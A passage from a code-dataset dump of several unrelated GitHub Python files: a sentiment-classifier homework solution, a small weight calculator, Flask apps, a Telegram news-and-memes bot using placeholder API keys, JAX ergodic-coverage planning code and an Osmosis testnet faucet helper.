\"\"\"\n Sentiment classifier that always predicts the positive class.\n \"\"\"\n def predict(self, sentence: List[str]) -> int:\n return 1\n\n\nclass PerceptronClassifier(SentimentClassifier):\n \"\"\"\n Implement this class -- you should at least have init() and implement the predict method from the SentimentClassifier\n superclass. Hint: you'll probably need this class to wrap both the weight vector and featurizer -- feel free to\n modify the constructor to pass these in.\n \"\"\"\n def __init__(self, feat_extractor):\n #raise Exception(\"Must be implemented\")\n SentimentClassifier.__init__(self)\n self.feat_extractor = feat_extractor\n self.indexer = self.feat_extractor.get_indexer()\n self.words_size = self.feat_extractor.vocab_size()\n self.weights = np.zeros((self.words_size,))\n self.feature_dic = {}\n \n def get_features(self, sentence: List[str]) -> List[int]: \n ex_sent = ''.join(sentence)\n if ex_sent not in self.feature_dic: \n feature = self.feat_extractor.extract_features(sentence)\n self.feature_dic[ex_sent] = feature\n else: \n feature = self.feature_dic[ex_sent]\n\n return feature\n\n def predict(self, sentence: List[str]) -> int: \n feature = self.get_features(sentence)\n weight_multi_feature = 0\n for key,val in feature:\n weight_multi_feature += self.weights[key] * val\n y_pre = 1 if weight_multi_feature >=0.5 else 0\n \n return y_pre\n\n def update_weight(self, sentence, y, y_pre, alpha): \n features = self.get_features(sentence)\n for k, val in features: \n self.weights[k] = self.weights[k] - (y_pre - y) * alpha * val\n\n#Calculate sigmoid\ndef sigmoid(x):\n result = 1./(1. + np.exp(-x))\n return result\n\nclass LogisticRegressionClassifier(SentimentClassifier):\n \"\"\"\n Implement this class -- you should at least have init() and implement the predict method from the SentimentClassifier\n superclass. Hint: you'll probably need this class to wrap both the weight vector and featurizer -- feel free to\n modify the constructor to pass these in.\n \"\"\"\n def __init__(self, feat_extractor):\n #raise Exception(\"Must be implemented\")\n SentimentClassifier.__init__(self)\n self.feat_extractor = feat_extractor\n self.indexer = self.feat_extractor.get_indexer()\n self.words_size = self.feat_extractor.vocab_size()\n self.weights = np.zeros((self.words_size,))\n self.feature_dic = {}\n\n def get_features(self, sentence: List[str]) -> List[int]:\n ex_sent = ''.join(sentence)\n if ex_sent not in self.feature_dic: \n feature = self.feat_extractor.extract_features(sentence)\n self.feature_dic[ex_sent] = feature\n else: \n feature = self.feature_dic[ex_sent]\n\n return feature\n\n def predict(self, sentence: List[str]) -> int: \n features = self.get_features(sentence)\n weight_multi_feature = 0 \n for k , val in features: \n weight_multi_feature += self.weights[k] * val\n\n result = sigmoid(weight_multi_feature)\n y_pre = 1 if result>0.5 else 0\n\n return y_pre\n\n def update_weight(self, sentence, y, y_pre, alpha): \n features = self.get_features(sentence)\n\n weight_multi_feature = 0\n for k ,val in features:\n weight_multi_feature += self.weights[k] * val\n \n result = sigmoid(weight_multi_feature)\n for k , val in features:\n self.weights[k] = self.weights[k] - alpha * ((result - y)* val)\n #self.weights[k] = self.weights[k] - alpha * (-y * val * (1-result) + (1-result) * val * result)\n\n def loss(self, train_exs): \n sum_loss = 0\n for ex in train_exs: \n x = ex.words\n y = ex.label\n feature = self.get_features(ex.words) \n \n weight_multi_feature = 0\n for k , val in feature: \n weight_multi_feature += self.weights[k] * val\n \n result = sigmoid(weight_multi_feature)\n loss = -y * np.log(result) - (1-y)* np.log(1-result)\n sum_loss += loss\n sum_loss = sum_loss / float(len(train_exs))\n\n return sum_loss\n\n\ndef train_perceptron(train_exs: List[SentimentExample], feat_extractor: FeatureExtractor) -> PerceptronClassifier:\n \"\"\"\n Train a classifier with the perceptron.\n :param train_exs: training set, List of SentimentExample objects\n :param feat_extractor: feature extractor to use\n :return: trained PerceptronClassifier model\n \"\"\"\n #raise Exception(\"Must be implemented\")\n #extract all the features first: \n for ex in train_exs: \n feat_extractor.add_features(ex.words)\n\n model = PerceptronClassifier(feat_extractor)\n epochs = 20\n alpha = 1\n for i in tqdm(range(epochs)): \n random.shuffle(train_exs)\n data_size = int(len(train_exs))\n data_ex = train_exs[:data_size]\n\n for ex in data_ex: \n y = ex.label\n y_pre = model.predict(ex.words)\n model.update_weight(ex.words, y, y_pre, alpha)\n \n alpha = alpha * 0.9\n \n return model\n\ndef train_logistic_regression(train_exs: List[SentimentExample], feat_extractor: FeatureExtractor) -> LogisticRegressionClassifier:\n \"\"\"\n Train a logistic regression model.\n :param train_exs: training set, List of SentimentExample objects\n :param feat_extractor: feature extractor to use\n :return: trained LogisticRegressionClassifier model\n \"\"\"\n #raise Exception(\"Must be implemented\")\n for ex in train_exs: \n feat_extractor.add_features(ex.words)\n\n model = LogisticRegressionClassifier(feat_extractor)\n epochs = 30\n alpha = 0.5\n \n for i in tqdm(range(epochs)): \n \"\"\" if(isinstance(feat_extractor, BetterFeatureExtractor)): \n alpha = alpha / (i+1) \"\"\"\n random.shuffle(train_exs)\n data_size = int(len(train_exs))\n data_exs = train_exs[:data_size]\n\n for ex in data_exs: \n y = ex.label\n y_pre = model.predict(ex.words)\n model.update_weight(ex.words, y, y_pre, alpha)\n \n return model\n\n#do not modify\ndef train_model(args, train_exs: List[SentimentExample], dev_exs: List[SentimentExample]) -> SentimentClassifier:\n \"\"\"\n Main entry point for your modifications. Trains and returns one of several models depending on the args\n passed in from the main method. You may modify this function, but probably will not need to.\n :param args: args bundle from sentiment_classifier.py\n :param train_exs: training set, List of SentimentExample objects\n :param dev_exs: dev set, List of SentimentExample objects. You can use this for validation throughout the training\n process, but you should *not* directly train on this data.\n :return: trained SentimentClassifier model, of whichever type is specified\n \"\"\"\n # Initialize feature extractor\n if args.model == \"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = UnigramFeatureExtractor(Indexer())\n elif args.feats == \"BIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = BigramFeatureExtractor(Indexer())\n elif args.feats == \"BETTER\":\n # Add additional preprocessing code here\n feat_extractor = BetterFeatureExtractor(Indexer())\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model","repo_name":"lyxmegan/Natural_Language_Processing","sub_path":"a1-distrib/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20250232547","text":"# Receber altura e sexo e mostrar o peso \"ideal\"\nalt = float(input('Digite sua altura: '))\nsexo = input('Digite seu sexo: (m/f) ')\n\nif sexo == 'm':\n peso = (72.7 * alt) - 58\n print(f'O peso \"ideal\" é {peso}Kg.')\nelif sexo == 'f':\n peso = (62.1 * alt) - 44.7\n print(f'O peso \"ideal\" é {peso}Kg.')\nelse:\n print('Valores inválidos!')\n","repo_name":"leandro-alvesc/estudos_python","sub_path":"guppe/exercicios/secao_05/ex010.py","file_name":"ex010.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37968893976","text":"from flask import Flask, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\n\n# from database_setup import Team, Venue, Base\n\nfrom datetime import datetime\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///pinball-league.db'\ndb = SQLAlchemy(app)\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n address = db.Column(db.String(250), nullable=False)\n city = db.Column(db.String(250), nullable=False)\n state = db.Column(db.String(250), nullable=False)\n home_team = db.relationship('team', backref='venue', uselist=False)\n\nclass Team(db.Model):\n __tablename__ = 'team'\n \n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n home_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'), unique=True)\n\n# Route to Home Page\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n# Route to Get Teams and Create new Team\n@app.route(\"/teams\", methods=['GET', 'POST'])\ndef teams():\n if request.method == 'POST':\n team_name = request.form['name']\n new_team = Team(name=team_name)\n db.session.add(new_team)\n db.session.commit()\n return redirect('teams')\n else:\n teams = db.session.query(Team).all()\n return render_template(\"teams.html\", teams=teams)\n\n@app.route(\"/teams/delete/\")\ndef delete_team(team_id):\n team = db.session.query(Team).filter_by(id=team_id).one()\n db.session.delete(team)\n db.session.commit()\n return redirect('/teams')\n\n# Route to Get Venue and Create new Venue\n@app.route(\"/venues\", methods=['GET', 'POST'])\ndef venues():\n if request.method == 'POST':\n venue_name = request.form['name']\n venue_address = request.form['address']\n venue_city = request.form['city']\n venue_state = request.form['state']\n new_venue = Venue(name=venue_name, address=venue_address, city=venue_city, state=venue_state)\n db.session.add(new_venue)\n db.session.commit()\n return redirect('venues')\n else:\n venues = db.session.query(Venue).all()\n return render_template(\"venues.html\", venues=venues)\n\n@app.route(\"/venues/delete/\")\ndef delete_venue(venue_id):\n venue = db.session.query(Venue).filter_by(id=venue_id).one()\n db.session.delete(venue)\n db.session.commit()\n return redirect('/venues')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ylijokic/Django_And_Flask_Projects","sub_path":"Pinball_League_App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2209903527","text":"import logging\nimport os\nimport requests\nimport re\nimport json\nimport praw\nfrom datetime import datetime, timedelta\nfrom bottle import route, template, run\nfrom twitter import *\nfrom newsapi.newsapi_client import NewsApiClient\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler, CallbackContext\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\n\nPORT = int(os.environ.get('PORT', 5000))\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\nTOKEN = 'insert telegram token'\n\n# Define a few command handlers. These usually take the two arguments update and\n# context. Error handlers also receive the raised TelegramError object in error.\ndef start(update, context):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n update.message.reply_text('Welcome user!' + '\\U0001F44B' + '\\n\\n' +\n 'For a little bit of motivation in life ' + '\\U0001F973' + ', type /motivate\\n' +\n 'For a random dog picture ' + '\\U0001F436' + ', type /dog\\n' +\n 'For a random reddit meme ' + '\\U0001F92A' + ', type /memes\\n' +\n 'For a random unsplash wallpaper ' + '\\U0001F5BC' + ', type /wallpaper\\n' +\n 'For current Singapore weather ' + '\\U0001F324' + ', type /weather\\n' +\n 'For latest tweets in Singapore ' + '\\U0001F4AC' + ', type /tweets\\n\\n' +\n 'For SG latest news, choose from the following\\n' +\n 'COVID19 ' + '\\U0001F9A0' + ' ---> /covid \\n' +\n 'Business ' + '\\U0001F4BC' + ' ---> /business \\n' +\n 'Entertainment ' + '\\U0001F38A' + ' ---> /entertainment \\n' +\n 'Technology ' + '\\U0001F4F1' + ' ---> /technology \\n' +\n 'Sports ' + '\\U0001F93E' + ' ---> /sports \\n\\n' +\n 'Bot creation tutorial ' + '\\U0001F9D0' + ' ---> /tutorial')\n sheet_db.append_row([update.message.from_user.username, (datetime.now()+ timedelta(hours=8)).strftime(\"%d/%m/%Y %H:%M:%S\"), \"start\"])\n\n# motivational quote\ndef motivate(update, context):\n quote = requests.request(url='https://api.quotable.io/random',method='get')\n update.message.reply_text(quote.json()['content'])\n\n# dog pics\ndef dog(update, context):\n contents = requests.get('https://random.dog/woof.json').json()\n dog_pic = contents['url']\n update.message.reply_text(dog_pic)\n \n# unsplash wallpaper\ndef wallpaper(update, context):\n url = 'insert unsplash token'\n response = requests.get(url)\n wall_pic = response.json()['urls']['regular']\n update.message.reply_text(wall_pic)\n\n# news\nnewsapi = NewsApiClient(api_key='insert newsapi key')\nbusiness_news = newsapi.get_top_headlines(category='business', language='en', country='sg', page_size=3)\ndef business(update, context):\n business1 = list(business_news.values())[2][0]['title'] + '\\n\\n' + list(business_news.values())[2][0]['url']\n business2 = list(business_news.values())[2][1]['title'] + '\\n\\n' + list(business_news.values())[2][1]['url']\n business3 = list(business_news.values())[2][2]['title'] + '\\n\\n' + list(business_news.values())[2][2]['url']\n update.message.reply_text(business1)\n update.message.reply_text(business2)\n update.message.reply_text(business3)\n \nenter_news = newsapi.get_top_headlines(category='entertainment', language='en', country='sg', page_size=3)\ndef entertainment(update, context):\n entertainment1 = list(enter_news.values())[2][0]['title'] + '\\n\\n' + list(enter_news.values())[2][0]['url']\n entertainment2 = list(enter_news.values())[2][1]['title'] + '\\n\\n' + list(enter_news.values())[2][1]['url']\n entertainment3 = list(enter_news.values())[2][2]['title'] + '\\n\\n' + list(enter_news.values())[2][2]['url']\n update.message.reply_text(entertainment1)\n update.message.reply_text(entertainment2)\n update.message.reply_text(entertainment3)\n \ntech_news = newsapi.get_top_headlines(category='technology', language='en', country='sg', page_size=3)\ndef technology(update, context):\n tech1 = list(tech_news.values())[2][0]['title'] + '\\n\\n' + list(tech_news.values())[2][0]['url']\n tech2 = list(tech_news.values())[2][1]['title'] + '\\n\\n' + list(tech_news.values())[2][1]['url']\n tech3 = list(tech_news.values())[2][2]['title'] + '\\n\\n' + list(tech_news.values())[2][2]['url']\n update.message.reply_text(tech1)\n update.message.reply_text(tech2)\n update.message.reply_text(tech3)\n \nsports_news = newsapi.get_top_headlines(category='sports', language='en', country='sg', page_size=3)\ndef sports(update, context):\n sports1 = list(sports_news.values())[2][0]['title'] + '\\n\\n' + list(sports_news.values())[2][0]['url']\n sports2 = list(sports_news.values())[2][1]['title'] + '\\n\\n' + list(sports_news.values())[2][1]['url']\n sports3 = list(sports_news.values())[2][2]['title'] + '\\n\\n' + list(sports_news.values())[2][2]['url']\n update.message.reply_text(sports1)\n update.message.reply_text(sports2)\n update.message.reply_text(sports3)\n \ncovid_news = newsapi.get_top_headlines(q='covid', language='en', country='sg', page_size=3)\ndef covid(update, context):\n covid1 = list(covid_news.values())[2][0]['title'] + '\\n\\n' + list(covid_news.values())[2][0]['url']\n covid2 = list(covid_news.values())[2][1]['title'] + '\\n\\n' + list(covid_news.values())[2][1]['url']\n covid3 = list(covid_news.values())[2][2]['title'] + '\\n\\n' + list(covid_news.values())[2][2]['url']\n update.message.reply_text(covid1)\n update.message.reply_text(covid2)\n update.message.reply_text(covid3)\n\n# weather\napi_key = \"insert weather api\"\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\ncomplete_url = base_url + \"appid=\" + api_key + \"&q=\" + \"singapore\" \nresponse = requests.get(complete_url) \nx = response.json() \ncurrent_temperature = x['main']['temp']-273.15\nfeels_like = x['main']['feels_like']-273.15\nweather_description = x['weather'][0]['description']\ndef weather(update, context):\n weather_stats = \"\\U0001F324 Singapore Weather \\U0001F327\" + \"\\n\\nWeather Description = \" + str(weather_description) + \\\n \"\\nCurrent Temperature (in degree celsius) = \" + str(round(current_temperature,1)) + \\\n \"\\nFeels like (in degree celsius) = \" + str(round(feels_like,1))\n update.message.reply_text(weather_stats) \n\n# memes\ndef memes(update, context):\n reddit = praw.Reddit(client_id='insert reddit client id',\n client_secret='insert reddit client secret key', \n password='insert reddit api password',\n user_agent='insert reddit api user_agent',\n username='insert reddit api username')\n subreddit = reddit.subreddit(\"memes\")\n meme = subreddit.random()\n update.message.reply_text(meme.url)\n\n# twitter \ndef tweets(update, context):\n update.message.reply_text(text='What Twitter topics are you interested in?')\ndef tweets_reply(update, context):\n user_input = update.message.text\n consumer_key= 'insert twitter consumer key'\n consumer_secret= 'insert twitter consumer secret'\n access_token= 'insert twitter access token'\n access_token_secret= 'insert twitter access secret'\n twitter = Twitter(auth = OAuth(access_token, access_token_secret, consumer_key, consumer_secret))\n latitude = 1.3521 \n longitude = 103.8198 \n max_range = 20\n query_search = user_input + \"-filter:retweets\"\n query = twitter.search.tweets(q = query_search, geocode = \"%f,%f,%dkm\" % (latitude, longitude, max_range), lang='en',count=3)\n answer = f'\\U0001F4F1 Showing latest 3 tweets in SG for: {user_input}'\n update.message.reply_text(answer)\n update.message.reply_text(query['statuses'][0]['text'])\n update.message.reply_text(query['statuses'][1]['text'])\n update.message.reply_text(query['statuses'][2]['text'])\n \n# bot creation tutorial\ndef tutorial(update, context):\n update.message.reply_text('https://kierantan.medium.com/building-a-one-stop-api-caller-on-telegram-with-python-f8ff845d5985')\n \ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n # Make sure to set use_context=True to use the new context based callbacks\n # Post version 12 this will no longer be necessary\n updater = Updater(TOKEN, use_context=True)\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"motivate\", motivate))\n dp.add_handler(CommandHandler(\"dog\", dog))\n dp.add_handler(CommandHandler(\"business\", business))\n dp.add_handler(CommandHandler(\"entertainment\", entertainment))\n dp.add_handler(CommandHandler(\"technology\", technology))\n dp.add_handler(CommandHandler(\"sports\", sports))\n dp.add_handler(CommandHandler(\"covid\", covid))\n dp.add_handler(CommandHandler(\"wallpaper\", wallpaper))\n dp.add_handler(CommandHandler(\"weather\", weather))\n dp.add_handler(CommandHandler(\"memes\", memes))\n dp.add_handler(CommandHandler(\"tutorial\", tutorial))\n dp.add_handler(CommandHandler(\"tweets\", tweets))\n dp.add_handler(MessageHandler(Filters.text, tweets_reply))\n\n # log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\", port=int(PORT), url_path=TOKEN)\n updater.bot.setWebhook('insert heroku app name' + TOKEN)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\nif __name__ == '__main__':\n main()","repo_name":"kahwangt/telegram_bot","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":9979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13515440948","text":"import numpy as np\nfrom jax import vmap, jit, grad\nimport jax.numpy as jnp\nfrom jax.lax import scan\nimport copy\n# from jax.config import config; config.update(\"jax_enable_x64\", True)\nfrom functools import partial\nstep_size=50\ntempvar=1\ntemptheta=0\nrob_vel = 0.8\n\ndef wrapToPi(x):\n\t# print(\"x!!!!!!!!!!!: \", x)\t\n\tif x > 3.14:\n\t\tx = x - 2*3.14\n\telif x < -3.14:\n\t\tx = x + 2*3.14\n\treturn x\n\ndef fDyn(x, u): # dynamics of the robot - point mass\n\txnew = x + jnp.array([jnp.tanh(u[0]),jnp.tanh(u[0]),10*u[1]])\n\t# xnew = x + jnp.array([0.8,0.8,10*u[1]])\n\treturn xnew, x\n\ndef fDiffDrive(x0, u):\n\t\"\"\"\n\tx0 = (x,y,theta)\n\tu = (v,w)\n\n\tx0 = (x,y,theta,v)\n\tu = (w,a)\n\t\"\"\"\n\tu = jnp.tanh(u) #Limit the maximum velocity to 1\n\tx = x0 + jnp.array([jnp.cos(x0[2])*0.02, jnp.sin(x0[2])*0.02, 0.8*u[0]])\n\n\treturn x, x0\n\ndef get_hk(k): # normalizing factor for basis function\n\t_hk = jnp.array((2. * k + np.sin(2 * k))/(4. * k))\n\t_hk = _hk.at[np.isnan(_hk)].set(1.)\t\n\treturn np.sqrt(np.prod(_hk))\n\ndef fk(x, k): # basis function\n return jnp.prod(jnp.cos(x*k))\n\n# def GetTrajXY(u, x0):\n# \t\"\"\"\n# \t\"\"\"\n\n# \txf, tr0 = scan(fDiffDrive, x0, u)\n# \ttemptheta=tr0[tempvar*10][2]\n\t\n# \ttr = tr0[:,0:2] # take the (x,y) part of all points\n# \t# print(len(tr), \" type of tr\")\n# \treturn xf, tr\ndef GetTrajXY(u, x0):\n\t\"\"\"\n\t\"\"\"\n\n\txf, tr0 = scan(fDiffDrive, x0, u)\n\tsome=tr0[step_size-1][2]\n\n\ttr = tr0[:,0:2] # take the (x,y) part of all points\n\treturn xf, tr,some\n\ndef GetTrajXYTheta(u,x0):\n\txf, tr = scan(fDiffDrive, x0, u)\n\treturn xf, tr\n\n\nclass ErgCalc(object):\n\t\"\"\"\n\tmodified from Ian's Ergodic Coverage code base.\n\t\"\"\"\n\tdef __init__(self, pdf, n_agents, nA, n_fourier, nPix):\n\t\t# print(\"Number of agents: \", n_agents)\n\t\tself.n_agents = n_agents\n\t\tself.nPix = nPix\n\t\tself.nA = nA\n\t\t# aux func\n\t\tself.fk_vmap = lambda _x, _k: vmap(fk, in_axes=(0,None))(_x, _k)\n\t\tself.x0=jnp.array(())\n\n\t\t# fourier indices\n\t\tk1, k2 = jnp.meshgrid(*[jnp.arange(0, n_fourier, step=1)]*2)\n\t\tk = jnp.stack([k1.ravel(), k2.ravel()]).T\n\t\tself.k = jnp.pi*k\n\n\t\t# lambda, the weights of different bands.\n\t\tself.lamk = (1.+jnp.linalg.norm(self.k/jnp.pi,axis=1)**2)**(-4./2.)\n\n\t\t# the normalization factor\n\t\thk = []\n\t\tfor ki in k:\n\t\t\thk.append(get_hk(ki))\n\t\tself.hk = jnp.array(hk)\n\n\t\t# compute phik\n\t\tif isinstance(nPix,int) == True:\n\t\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\telse: #Using this when using a window around the agent and the window is not a square\n\t\t\tX,Y = jnp.meshgrid(jnp.linspace(0,1,num=self.nPix[0]),jnp.linspace(0,1,num=self.nPix[1]))\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\t# print(\"nPix: \", self.nPix)\n\t\t# print(\"Shape of vmap: \",vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k).shape)\n\t\t# print(\"Shape of pdf: \", pdf.shape)\n\t\t\n\t\tphik = jnp.dot(vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k), pdf) #vmap(p)(_s)\n\t\tphik = phik/phik[0]\n\t\tself.phik = phik/self.hk\t\t \n\n\t\t# for reconstruction\n\t\tself.phik_recon = jnp.dot(self.phik, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\t\t\n\t\t# to compute gradient func\n\t\tself.gradient = jit(grad(self.fourier_ergodic_loss))\n\t\tself.temptraj=[]\n\t\tself.fulltraj=[]\n\t\tself.step=0\n\t\tself.step_size=50\n\t\tself.precau=[]\n\n\t\treturn\n\t\n\tdef get_recon(self, FC):\n\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\treturn jnp.dot(FC, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\n\tdef get_ck(self, tr):\n\t\t\"\"\"\n\t\tgiven a trajectory tr, compute fourier coeffient of its spatial statistics.\n\t\tk is the number of fourier coeffs.\n\t\t\"\"\"\n\t\tck = jnp.mean(vmap(partial(self.fk_vmap, tr))(self.k), axis=1)\n\t\tck = ck / self.hk\n\t\treturn ck\n\n\tdef fourier_ergodic_loss(self, u): \n\t\tck = 0\n\t\ttrajectories=copy.copy(self.fulltraj)\n\t\tx0_i=self.x0\n\t\txf, tr,thet = GetTrajXY(u, x0_i)\n\t\tself.temptehta=thet\n\t\tfor k in range(len(tr)):\n\t\t\ttrajectories.append(tr[k])\n\t\tck = self.get_ck(jnp.array(trajectories))\n\t\tself.temptraj=trajectories\n\n\t\t\n\t\ttraj_cost = 0 \n\t\t# lambda, the weights of different bands.\n\t\ttraj_cost += jnp.mean((jnp.array(trajectories) - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) + 3e-2 * jnp.mean(u**2) + traj_cost\n\t\tprint(\"Ergodicity: \", ergodicity)\n\t\tprint(\"len of traj: \", len(self.temptraj))\n\t\t# print(self.temptraj[-1])\n\t\treturn ergodicity\n\n\tdef fourier_ergodic_lossbb(self, u, flag=False): \n\t\tck = 0\n\n\t\ttrajectories=copy.copy(self.fulltraj)\n\t\tx0_i=[0,0,0]\n\t\txf, tr,thet,full = GetTrajXY(u, x0_i,self.step)\n\t\tself.temptehta=thet\n\t\tfor k in range(len(tr)):\n\t\t\ttrajectories.append(tr[k])\n\t\tck = self.get_ck(jnp.array(trajectories))\n\n\t\tck = ck / (self.n_agents)\n\t\tself.temptraj=trajectories\n\n\t\t\n\t\ttraj_cost = 0 \n\t\ttraj_cost += jnp.mean((jnp.array(trajectories) - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) # + 3e-2 * jnp.mean(u**2) + traj_cost\n\t\tprint(\"Ergodicity: \", ergodicity)\n\t\tprint(\"len of traj: \", len(self.temptraj))\n\t\treturn ergodicity\n\n\n\n\tdef trajstep(self,flag):\n\t\tself.step+=1\n\t\t# tempvar=tempvar+1\n\n\t\t# for i in range(len(self.temptraj)):\n\t\tself.fulltraj=[]\n\t\tprint(len(self.temptraj),\" fcc\")\n\t\tif (flag):\n\t\t\tfor i in range(len(self.temptraj)):\n\t\t\t\tself.fulltraj.append(self.temptraj[i])\n\t\t\treturn\n\t\t\n\t\tfor i in range(self.step_size*self.step):\n\t\t\ta=max(self.temptraj[i][0],0)\n\t\t\ta=min(self.temptraj[i][0],1)\n\t\t\tb=max(self.temptraj[i][1],0)\n\t\t\tb=min(self.temptraj[i][1],1)\n\n\t\t\tif a<0:\n\t\t\t\ta=0\n\t\t\tif a>1:\n\t\t\t\ta=1\n\n\t\t\tif b<0:\n\t\t\t\tb=0\n\t\t\tif b>1:\n\t\t\t\tb=1\n\t\t\t\t\n\n\t\t\tself.fulltraj.append([a,b])\n\t\t\t# print(a,b)\n\t\tself.theta=wrapToPi(self.temptehta)\n\t\t# print(self.precau[self.step_size-1], \" theta\")\n\t\t# self.theta=self.precau[self.step_size-1][2]\n\t\treturn\n\n\n\n\n\n\tdef fourier_ergodic_loss_traj(self,traj):\n\t\tck = self.get_ck(traj)\n\t\ttraj_cost = jnp.mean((traj - jnp.array([0.5,0.5]))**8)\n\t\tergodicity = jnp.sum(self.lamk*jnp.square(self.phik - ck)) + traj_cost\n\t\treturn ergodicity\n\n\tdef traj_stat(self, u, x0):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\txf, tr = GetTrajXY(u, x0)\n\t\tck = self.get_ck(tr)\n\t\tX,Y = jnp.meshgrid(*[jnp.linspace(0,1,num=self.nPix)]*2)\n\t\t_s = jnp.stack([X.ravel(), Y.ravel()]).T\n\t\tpdf = jnp.dot(ck, vmap(self.fk_vmap, in_axes=(None, 0))(_s, self.k)).reshape(X.shape)\n\t\treturn pdf\n","repo_name":"bshirose/ergodic_planner","sub_path":"ergodic_metric.py","file_name":"ergodic_metric.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33723288603","text":"from time import sleep\n\nimport requests\n\nfrom cosmpy.aerial.config import NetworkConfig\n\nNET_CONFIG = NetworkConfig(\n chain_id=\"osmo-test-4\",\n url=\"rest+https://lcd-test.osmosis.zone/\",\n fee_minimum_gas_price=1,\n fee_denomination=\"uosmo\",\n staking_denomination=\"uosmo\",\n)\n\n\nclass FaucetMixIn:\n \"\"\"Osmosis faucet config\"\"\"\n\n def ask_funds(self, wallet):\n \"\"\"Request fund from faucet.\n\n :param wallet: Wallet Address\n :raises Exception: fail to topup\n \"\"\"\n resp = requests.post(\n \"https://testnet-faucet.dev-osmosis.zone/request\",\n json={\"address\": str(wallet.address())},\n )\n assert resp.status_code == 200\n ledger = self.get_ledger()\n for i in range(10):\n if ledger.query_bank_balance(wallet.address()) > 0:\n break\n sleep(i * 2)\n else:\n raise Exception(\"fail to topup\")\n","repo_name":"SantaHub/cosmpy","sub_path":"tests/integration/osmosis_testnet/net_config.py","file_name":"net_config.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"34996898627","text":"from flask import Blueprint\nfrom flask_api import status\nimport json\nimport mysql.connector\nimport conf\n\nrandom = Blueprint('random', __name__)\n\n@random.route('/random/')\ndef handle(amount):\n # amount should be > 1\n if (amount < 1):\n return '', status.HTTP_400_BAD_REQUEST\n\n connector = mysql.connector.connect(\n user=conf.user,\n database=conf.database,\n passwd=conf.passwd,\n host=conf.host,\n port=conf.port)\n\n answer = []\n\n cursor = connector.cursor()\n\n cursor.callproc('get_random_items', args=[amount])\n\n result = next(cursor.stored_results())\n\n for line in result:\n answer.append(line[0])\n\n cursor.close()\n return json.dumps(answer), status.HTTP_200_OK","repo_name":"qwertxzy/nozama-api","sub_path":"endpoints/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509894738","text":"\"\"\"\nAuthor : Byunghyun Ban\nDate : 2020.07.17.\n\"\"\"\nimport random\n\nimport time\ntry:\n from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n import pip\n pip.main(['install', 'matplotlib'])\n try:\n from matplotlib import pyplot as plt\n 